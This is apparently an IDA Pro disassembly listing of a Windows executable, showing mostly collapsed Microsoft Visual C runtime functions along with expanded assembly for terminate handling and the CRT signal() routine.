dd 3 dup(9090909h), 9090605h, 2 dup(9090909h), 9090907h
dd 0CC080909h
; [00000180 BYTES: COLLAPSED FUNCTION __getstream. PRESS KEYPAD "+" TO EXPAND]
; [00000274 BYTES: COLLAPSED FUNCTION __flsbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000C24 BYTES: COLLAPSED FUNCTION unknown_libname_7. PRESS KEYPAD "+" TO EXPAND]
off_428DE4 dd offset unknown_libname_8 ; DATA XREF: unknown_libname_7+B9�r
; Microsoft VisualC 2-8/net runtime
dd offset loc_42831A
dd offset loc_42835C
dd offset loc_4283CB
dd offset loc_428423
dd offset loc_428432
dd offset loc_42847E
dd offset loc_428511
off_428E04 dd offset loc_4283A8 ; DATA XREF: unknown_libname_7+1CC�r
dd offset loc_4283B3
dd offset loc_42839E
dd offset loc_428393
dd offset loc_4283BE
dd offset loc_4283C6
byte_428E1C db 0 ; DATA XREF: unknown_libname_7+1C6�r
db 2 dup(5), 1
dd 5050505h, 2050505h, 5050305h
db 4
dd offset loc_4284C0 ; DATA XREF: unknown_libname_7+2EE�r
dd offset loc_4284F9
dd offset loc_4284B5
dd offset loc_428503
dd offset loc_42850C
byte_428E41 db 0 ; DATA XREF: unknown_libname_7+2E8�r
dw 404h
dd 7 dup(4040404h), 4040401h, 4040402h, 4040404h, 3040404h
dd offset loc_42854C ; DATA XREF: unknown_libname_7+385�r
dd offset loc_4287E0
dd offset loc_428670
dd offset loc_428919
dd offset loc_4285DB
dd offset loc_428561
dd offset loc_4288EB
dd offset loc_4287F0
dd offset loc_428795
dd offset loc_428965
dd offset loc_42890F
dd offset loc_428686
dd offset loc_428903
dd offset loc_428925
dd offset loc_428BF7
byte_428EAC db 0 ; DATA XREF: unknown_libname_7+37F�r
db 0Eh, 1, 0Eh
dd 0E0E0E01h, 2 dup(0E0E0E0Eh), 0E0E0E02h, 40E030Eh, 2 dup(0E0E0E0Eh)
dd 7070605h, 0E060E07h, 80E0E0Eh, 0E0E0A09h, 0E0C0E0Bh
dd 0CCCC0D0Eh, 3 dup(0CCCCCCCCh)
; [00000077 BYTES: COLLAPSED FUNCTION _write_char. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000035 BYTES: COLLAPSED FUNCTION _write_multi_char. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004A BYTES: COLLAPSED FUNCTION _write_string. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001A BYTES: COLLAPSED FUNCTION _get_int_arg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION _get_int64_arg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION _get_short_arg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION __mtinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000029 BYTES: COLLAPSED FUNCTION __mtterm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000019 BYTES: COLLAPSED FUNCTION __initptd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000098 BYTES: COLLAPSED FUNCTION __getptd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000107 BYTES: COLLAPSED FUNCTION __freeptd. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
call ds:dword_4F54C4 ; GetCurrentThreadId
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call ds:dword_4F54DC ; GetCurrentThread
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000344 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000059 BYTES: COLLAPSED FUNCTION _getSystemCP. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000050 BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
off_429710 dd offset loc_4296EE ; DATA XREF: _CPtoLCID+27�r
dd offset loc_4296F5
dd offset loc_4296FC
dd offset loc_429703
dd offset loc_42970A
byte_429724 db 0 ; DATA XREF: _CPtoLCID+21�r
db 3 dup(4)
dd 4040401h, 2 dup(4040404h), 0CC030204h, 2 dup(0CCCCCCCCh)
; [00000074 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000302 BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION __getmbcp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000022 BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000125 BYTES: COLLAPSED FUNCTION __mbsnbcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000091 BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000D BYTES: COLLAPSED FUNCTION __errno. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000D BYTES: COLLAPSED FUNCTION ___doserrno. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000B BYTES: COLLAPSED FUNCTION __toupper. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000093 BYTES: COLLAPSED FUNCTION _toupper. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000012B BYTES: COLLAPSED FUNCTION _toupper_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000157 BYTES: COLLAPSED FUNCTION __stbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000094 BYTES: COLLAPSED FUNCTION __ftbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00001328 BYTES: COLLAPSED FUNCTION unknown_libname_11. PRESS KEYPAD "+" TO EXPAND]
off_42B418 dd offset loc_42A3AA ; DATA XREF: unknown_libname_11+239�r
dd offset loc_42A330
dd offset loc_42A348
dd offset loc_42A38C
dd offset loc_42A335
dd offset loc_42A397
dd offset loc_42A39F
dd offset unknown_libname_12 ; Microsoft VisualC 2-8/net runtime
byte_42B438 db 0 ; DATA XREF: unknown_libname_11+233�r
db 3 dup(7)
dd 6 dup(7070707h), 2070701h, 7030707h, 7070701h, 5 dup(7070707h)
dd 7040707h, 7050707h, 2 dup(7070707h)
db 7, 6
off_42B486 dd offset loc_42A4BB ; DATA XREF: unknown_libname_11+3C4�r
dd offset loc_42A9F4
dd offset loc_42AE67
dd offset loc_42A8EB
dd offset loc_42AE52
dd offset loc_42A9F0
dd offset loc_42A501
dd offset loc_42A8F2
dd offset loc_42A526
dd offset loc_42B23A
byte_42B4AE db 0 ; DATA XREF: unknown_libname_11+3BE�r
db 1
dd 9020202h, 9090903h, 5010409h, 9060909h, 7090901h, 0CC080909h
dd 2 dup(0CCCCCCCCh)
; [00000058 BYTES: COLLAPSED FUNCTION __hextodec. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000051 BYTES: COLLAPSED FUNCTION __inc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION __un_inc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000039 BYTES: COLLAPSED FUNCTION __whiteout. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION __frnd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000055 BYTES: COLLAPSED FUNCTION __handle_qnan1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000067 BYTES: COLLAPSED FUNCTION __handle_qnan2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B2 BYTES: COLLAPSED FUNCTION __except1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000CE BYTES: COLLAPSED FUNCTION __except2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000004B1 BYTES: COLLAPSED FUNCTION __raise_exc. PRESS KEYPAD "+" TO EXPAND]
off_42BD21 dd offset loc_42BCAC ; DATA XREF: __raise_exc+3FF�r
dd offset loc_42BC9A
dd offset loc_42BC88
dd offset loc_42BC76
align 10h
; [00000372 BYTES: COLLAPSED FUNCTION __handle_exc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000009B BYTES: COLLAPSED FUNCTION __umatherr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003A BYTES: COLLAPSED FUNCTION __set_errno. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003F BYTES: COLLAPSED FUNCTION __get_fname. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000071 BYTES: COLLAPSED FUNCTION __errcode. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003E BYTES: COLLAPSED FUNCTION __set_exp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002D BYTES: COLLAPSED FUNCTION __get_exp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000033 BYTES: COLLAPSED FUNCTION __add_exp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __set_bexp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007C BYTES: COLLAPSED FUNCTION __sptype. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000139 BYTES: COLLAPSED FUNCTION __decomp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000016 BYTES: COLLAPSED FUNCTION __statfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION __clrfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000032 BYTES: COLLAPSED FUNCTION __ctrlfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000075 BYTES: COLLAPSED FUNCTION __set_statfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005E BYTES: COLLAPSED FUNCTION __ms_p5_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000042 BYTES: COLLAPSED FUNCTION __ms_p5_mp_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000A8 BYTES: COLLAPSED FUNCTION __forcdecpt. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000D7 BYTES: COLLAPSED FUNCTION __cropzeros. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002D BYTES: COLLAPSED FUNCTION __positive. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000048 BYTES: COLLAPSED FUNCTION __fassign. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000076 BYTES: COLLAPSED FUNCTION __cftoe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000166 BYTES: COLLAPSED FUNCTION __cftoe2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000006A BYTES: COLLAPSED FUNCTION __cftof. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000013D BYTES: COLLAPSED FUNCTION __cftof2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E5 BYTES: COLLAPSED FUNCTION __cftog. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005F BYTES: COLLAPSED FUNCTION __cfltcvt. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002E BYTES: COLLAPSED FUNCTION __shift. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000EF BYTES: COLLAPSED FUNCTION ___InternalCxxFrameHandler. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000002A0 BYTES: COLLAPSED FUNCTION FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [00000115 BYTES: COLLAPSED FUNCTION FindHandlerForForeignException(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,int,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B6 BYTES: COLLAPSED FUNCTION TypeMatch(_s_HandlerType const *,_s_CatchableType const *,_s_ThrowInfo const *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000F7 BYTES: COLLAPSED FUNCTION ___FrameUnwindToState. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002C BYTES: COLLAPSED FUNCTION sub_42D480. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B7 BYTES: COLLAPSED FUNCTION unknown_libname_21. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000DD BYTES: COLLAPSED FUNCTION CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; [0000005E BYTES: COLLAPSED FUNCTION sub_42D64D. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000014 BYTES: COLLAPSED CHUNK OF FUNCTION CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000042 BYTES: COLLAPSED FUNCTION ExFilterRethrow(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000027B BYTES: COLLAPSED FUNCTION BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000086 BYTES: COLLAPSED FUNCTION _DestructExceptionObject(EHExceptionRecord *,uchar). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000046 BYTES: COLLAPSED FUNCTION ___AdjustPointer. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004C BYTES: COLLAPSED FUNCTION unknown_libname_22. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000006C BYTES: COLLAPSED FUNCTION terminate(void). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp short loc_42DB34
; [00000005 BYTES: COLLAPSED FUNCTION j__abort. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; [00000011 BYTES: COLLAPSED CHUNK OF FUNCTION terminate(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION unexpected(void). PRESS KEYPAD "+" TO EXPAND]
db 5Dh ; ]
db 0C3h ;
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_42DB70 proc near ; CODE XREF: _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *)+23�p
; _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *):loc_42096D�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042DBE0 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D388
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
cmp off_4542C0, 0
jz short loc_42DBCC
mov [ebp+var_4], 1
call off_4542C0 ; terminate(void)
mov [ebp+var_4], 0
jmp short loc_42DBCC
; ---------------------------------------------------------------------------
loc_42DBBC: ; DATA XREF: .rdata:0043D398�o
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_42DBC2: ; DATA XREF: .rdata:0043D39C�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_42DBCC: ; CODE XREF: sub_42DB70+34�j
; sub_42DB70+4A�j
mov [ebp+var_4], 0FFFFFFFFh
call j_?terminate@@YAXXZ ; terminate(void)
sub_42DB70 endp
; ---------------------------------------------------------------------------
db 0EBh ;
db 6
; [00000005 BYTES: COLLAPSED FUNCTION terminate(void). PRESS KEYPAD "+" TO EXPAND]
db 0C3h ;
; START OF FUNCTION CHUNK FOR sub_42DB70
db 8Bh ;
db 4Dh ; M
db 0F0h ;
db 64h ; d
db 89h ;
db 0Dh
db 0
db 0
db 0
db 0
db 5Fh ; _
db 5Eh ; ^
db 5Bh ; [
db 8Bh ;
db 0E5h ;
db 5Dh ; ]
db 0C3h ;
; END OF FUNCTION CHUNK FOR sub_42DB70
align 10h
; [000000EE BYTES: COLLAPSED FUNCTION ___loctotime_t. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000003EF BYTES: COLLAPSED FUNCTION _setlocale. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000193 BYTES: COLLAPSED FUNCTION __setlocale_set_cat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000100 BYTES: COLLAPSED FUNCTION __setlocale_get_all. PRESS KEYPAD "+" TO EXPAND]
; [00000184 BYTES: COLLAPSED FUNCTION __expandlocale. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E510 proc near ; CODE XREF: __setlocale_set_cat+12B�p
; DATA XREF: .data:off_4543D8�o
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_42E510 endp
; ---------------------------------------------------------------------------
align 10h
; [0000004F BYTES: COLLAPSED FUNCTION __strcats. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000015D BYTES: COLLAPSED FUNCTION ___lc_strtolc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000065 BYTES: COLLAPSED FUNCTION ___lc_lctostr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION __lseek. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B2 BYTES: COLLAPSED FUNCTION __lseek_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000062 BYTES: COLLAPSED FUNCTION _ftell. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000029A BYTES: COLLAPSED FUNCTION __ftell_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION __write. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000273 BYTES: COLLAPSED FUNCTION __write_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000305 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000050 BYTES: COLLAPSED FUNCTION _strncnt. PRESS KEYPAD "+" TO EXPAND]
; [000001BE BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000059 BYTES: COLLAPSED FUNCTION _xcptlookup. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BC BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000149 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000D8 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000424 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000219 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000324 BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000009B BYTES: COLLAPSED FUNCTION __ioterm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000049 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001BF BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000050 BYTES: COLLAPSED FUNCTION __GET_RTERRMSG. PRESS KEYPAD "+" TO EXPAND]
; [000000DA BYTES: COLLAPSED FUNCTION __fcloseall. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000042 BYTES: COLLAPSED FUNCTION __itoa. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000C2 BYTES: COLLAPSED FUNCTION _xtoa. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003F BYTES: COLLAPSED FUNCTION __ltoa. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001E BYTES: COLLAPSED FUNCTION __ultoa. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000048 BYTES: COLLAPSED FUNCTION __i64toa. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000F2 BYTES: COLLAPSED FUNCTION x64toa(x,x,x,x,x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __ui64toa. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
sub esp, 10h
push esi
cmp dword ptr [ebp+0Ch], 4
jz short loc_430783
cmp dword ptr [ebp+0Ch], 3
jnz short loc_430788
loc_430783: ; CODE XREF: .text:0043077B�j
jmp loc_430958
; ---------------------------------------------------------------------------
loc_430788: ; CODE XREF: .text:00430781�j
cmp dword ptr [ebp+8], 2
jz short loc_4307A4
cmp dword ptr [ebp+8], 15h
jz short loc_4307A4
cmp dword ptr [ebp+8], 16h
jz short loc_4307A4
cmp dword ptr [ebp+8], 0Fh
jnz loc_430881
loc_4307A4: ; CODE XREF: .text:0043078C�j
; .text:00430792�j ...
push 1
call __lock
add esp, 4
cmp dword ptr [ebp+8], 2
jz short loc_4307BA
cmp dword ptr [ebp+8], 15h
jnz short loc_4307FF
loc_4307BA: ; CODE XREF: .text:004307B2�j
cmp dword_4F374C, 0
jnz short loc_4307FF
push 1
push offset _ctrlevent_capture@4 ; ctrlevent_capture(x)
call ds:dword_4F53F8 ; SetConsoleCtrlHandler
cmp eax, 1
jnz short loc_4307E1
mov dword_4F374C, 1
jmp short loc_4307FF
; ---------------------------------------------------------------------------
loc_4307E1: ; CODE XREF: .text:004307D3�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov esi, eax
call ___doserrno
mov [eax], esi
push 1
call __unlock
add esp, 4
jmp loc_430958
; ---------------------------------------------------------------------------
loc_4307FF: ; CODE XREF: .text:004307B8�j
; .text:004307C1�j ...
mov eax, [ebp+8]
mov [ebp-10h], eax
mov ecx, [ebp-10h]
sub ecx, 2
mov [ebp-10h], ecx
cmp dword ptr [ebp-10h], 14h
ja short loc_430872
mov eax, [ebp-10h]
xor edx, edx
mov dl, ds:byte_43097F[eax]
jmp ds:off_43096B[edx*4]
loc_430826: ; DATA XREF: .text:off_43096B�o
mov ecx, dword_4F373C
mov [ebp-0Ch], ecx
mov edx, [ebp+0Ch]
mov dword_4F373C, edx
jmp short loc_430872
; ---------------------------------------------------------------------------
loc_43083A: ; CODE XREF: .text:0043081F�j
; DATA XREF: .text:00430973�o
mov eax, dword_4F3740
mov [ebp-0Ch], eax
mov ecx, [ebp+0Ch]
mov dword_4F3740, ecx
jmp short loc_430872
; ---------------------------------------------------------------------------
loc_43084D: ; CODE XREF: .text:0043081F�j
; DATA XREF: .text:00430977�o
mov edx, dword_4F3744
mov [ebp-0Ch], edx
mov eax, [ebp+0Ch]
mov dword_4F3744, eax
jmp short loc_430872
; ---------------------------------------------------------------------------
loc_430860: ; CODE XREF: .text:0043081F�j
; DATA XREF: .text:0043096F�o
mov ecx, dword_4F3748
mov [ebp-0Ch], ecx
mov edx, [ebp+0Ch]
mov dword_4F3748, edx
loc_430872: ; CODE XREF: .text:00430812�j
; .text:0043081F�j ...
push 1
call __unlock
add esp, 4
jmp loc_430953
; ---------------------------------------------------------------------------
loc_430881: ; CODE XREF: .text:0043079E�j
cmp dword ptr [ebp+8], 8
jz short loc_430898
cmp dword ptr [ebp+8], 4
jz short loc_430898
cmp dword ptr [ebp+8], 0Bh
jz short loc_430898
jmp loc_430958
; ---------------------------------------------------------------------------
loc_430898: ; CODE XREF: .text:00430885�j
; .text:0043088B�j ...
call __getptd
mov [ebp-4], eax
mov eax, [ebp-4]
cmp dword ptr [eax+50h], offset dword_454418
jnz short loc_4308F5
push 133h
push offset aWinsig_c ; "winsig.c"
push 2
mov ecx, dword_454498
push ecx
call __malloc_dbg
add esp, 10h
mov edx, [ebp-4]
mov [edx+50h], eax
mov eax, [ebp-4]
cmp dword ptr [eax+50h], 0
jz short loc_4308F3
mov ecx, dword_454498
push ecx
push offset dword_454418
mov edx, [ebp-4]
mov eax, [edx+50h]
push eax
call _memcpy
add esp, 0Ch
jmp short loc_4308F5
; ---------------------------------------------------------------------------
loc_4308F3: ; CODE XREF: .text:004308D4�j
jmp short loc_430958
; ---------------------------------------------------------------------------
loc_4308F5: ; CODE XREF: .text:004308AA�j
; .text:004308F1�j
mov ecx, [ebp-4]
mov edx, [ecx+50h]
push edx
mov eax, [ebp+8]
push eax
call _siglookup
add esp, 8
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_430913
jmp short loc_430958
; ---------------------------------------------------------------------------
loc_430913: ; CODE XREF: .text:0043090F�j
mov ecx, [ebp-8]
mov edx, [ecx+8]
mov [ebp-0Ch], edx
loc_43091C: ; CODE XREF: .text:loc_430951�j
mov eax, [ebp-8]
mov ecx, [eax+4]
cmp ecx, [ebp+8]
jnz short loc_430953
mov edx, [ebp-8]
mov eax, [ebp+0Ch]
mov [edx+8], eax
mov ecx, [ebp-8]
add ecx, 0Ch
mov [ebp-8], ecx
mov edx, dword_45449C
imul edx, 0Ch
mov eax, [ebp-4]
mov ecx, [eax+50h]
add ecx, edx
cmp [ebp-8], ecx
jb short loc_430951
jmp short loc_430953
; ---------------------------------------------------------------------------
loc_430951: ; CODE XREF: .text:0043094D�j
jmp short loc_43091C
; ---------------------------------------------------------------------------
loc_430953: ; CODE XREF: .text:0043087C�j
; .text:00430925�j ...
mov eax, [ebp-0Ch]
jmp short loc_430966
; ---------------------------------------------------------------------------
loc_430958: ; CODE XREF: .text:loc_430783�j
; .text:004307FA�j ...
call __errno
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_430966: ; CODE XREF: .text:00430956�j
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
off_43096B dd offset loc_430826 ; DATA XREF: .text:0043081F�r
dd offset loc_430860
dd offset loc_43083A
dd offset loc_43084D
dd offset loc_430872
byte_43097F db 0 ; DATA XREF: .text:00430819�r
dd 3 dup(4040404h), 4040401h, 3020404h, 3 dup(0CCCCCCCCh)
; [00000092 BYTES: COLLAPSED FUNCTION ctrlevent_capture(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000020A BYTES: COLLAPSED FUNCTION _raise. PRESS KEYPAD "+" TO EXPAND]
off_430C4A dd offset loc_430A78 ; DATA XREF: _raise+31�r
dd offset loc_430AE3
dd offset loc_430AC9
dd offset loc_430A95
dd offset loc_430AAF
dd offset loc_430B0E
byte_430C62 db 0 ; DATA XREF: _raise+2B�r
db 5
dd 5050501h, 1050501h, 2050505h, 5050505h, 0CC040305h
dd 2 dup(0CCCCCCCCh)
; [0000005B BYTES: COLLAPSED FUNCTION _siglookup. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000D BYTES: COLLAPSED FUNCTION unknown_libname_24. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000D BYTES: COLLAPSED FUNCTION ___pxcptinfoptrs. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BB BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001E2 BYTES: COLLAPSED FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B7 BYTES: COLLAPSED FUNCTION __set_osfhnd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000D8 BYTES: COLLAPSED FUNCTION __free_osfhnd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000066 BYTES: COLLAPSED FUNCTION __get_osfhandle. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000104 BYTES: COLLAPSED FUNCTION __open_osfhandle. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000086 BYTES: COLLAPSED FUNCTION __lock_fhandle. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000026 BYTES: COLLAPSED FUNCTION __unlock_fhandle. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000D2 BYTES: COLLAPSED FUNCTION unknown_libname_25. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001BC BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000C7 BYTES: COLLAPSED FUNCTION __getbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003F BYTES: COLLAPSED FUNCTION __open. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000050E BYTES: COLLAPSED FUNCTION __sopen. PRESS KEYPAD "+" TO EXPAND]
off_431C4E dd offset loc_43182E ; DATA XREF: __sopen+E7�r
dd offset loc_431837
dd offset loc_431840
dd offset loc_431849
dd offset loc_431852
byte_431C62 db 0 ; DATA XREF: __sopen+E1�r
db 4
dd 3 dup(4040404h), 4010404h, 3 dup(4040404h), 4020404h
dd 3 dup(4040404h), 0CC030404h, 3 dup(0CCCCCCCCh)
; [00000032 BYTES: COLLAPSED FUNCTION __isatty. PRESS KEYPAD "+" TO EXPAND]
align 10h
